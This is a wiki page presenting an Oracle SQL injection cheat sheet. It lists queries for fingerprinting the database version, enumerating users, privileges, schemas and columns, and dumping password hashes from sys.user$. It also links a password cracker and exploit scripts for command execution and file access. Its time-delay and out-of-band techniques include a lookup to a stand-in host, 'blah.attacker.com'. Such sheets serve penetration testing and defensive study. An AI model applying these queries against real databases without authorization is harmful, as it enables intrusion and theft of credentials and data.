====== Hacking - SQL Injection Cheat Sheet (ORACLE) ======

|Version|<code>
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
</code>|
|Comments|<code>
SELECT 1 FROM dual -- comment
-- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we're not actually selecting from a table.
</code>|
|Current User|SELECT user FROM dual|
|List Users|<code>
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv
</code>|
|List Password Hashes|<code>
SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
SELECT name,spare4 FROM sys.user$ -- priv, 11g
</code>|
|Password Cracker|[[http://www.red-database-security.com/software/checkpwd.html|checkpwd]] will crack the DES-based hashes from Oracle 8, 9 and 10.|
|List Privileges|<code>
SELECT * FROM session_privs; -- current privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
</code>|
|List DBA Accounts|SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles|
|Current Database|<code>
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
</code>|
|List Databases|<code>
SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Also query TNS listener for other databases. See [[http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html|tnscmd]] (services | status).
</code>|
|List Columns|<code>
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
</code>|
|List Tables|<code>
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
</code>|
|Find Tables From Column Name|SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case|
|Select Nth Row|SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)|
|Select Nth Char|SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'|
|Bitwise AND|<code>
SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns0
</code>|
|ASCII Value -> Char|SELECT chr(65) FROM dual; -- returns A|
|Char -> ASCII Value|SELECT ascii('A') FROM dual; -- returns 65|
|Casting|<code>
SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;
</code>|
|String Concatenation|<nowiki>SELECT 'A' || 'B' FROM dual; -- returns AB</nowiki>|
|If Statement|BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements|
|Case Statement|<code>
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
</code>|
|Avoiding Quotes|<nowiki>SELECT chr(65) || chr(66) FROM dual; -- returns AB</nowiki>|
|Time Delay|<code>
BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse looks are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com&#39;) FROM dual; -- if outbound TCP is filtered / slow
-- Also see [[https://technet.microsoft.com/en-us/library/cc512676.aspx|Heavy Queries]] to create a time delay
</code>|
|Make DNS Requests|<code>
SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com&#39;) FROM dual;
</code>|
|Command Execution |<code>

[[http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql|Java]] can be used to execute commands if it's installed.

[[http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql|ExtProc]] can sometimes be used too, though it normally failed for me. :-(
</code>|
|Local File Access|<code>
[[http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql|UTL_FILE]] can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

[[http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql|Java]] can be used to read and write files if it's installed (it is not available in Oracle Express).
</code>|
|Hostname, IP Address|<code>
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
</code>|
|Location of DB files|SELECT name FROM V$DATAFILE;|
|Default/System Databases|<code>
SYSTEM
SYSAUX
</code>|

----

===== References =====

https://www.michaelboman.org/books/sql-injection-cheat-sheet-oracle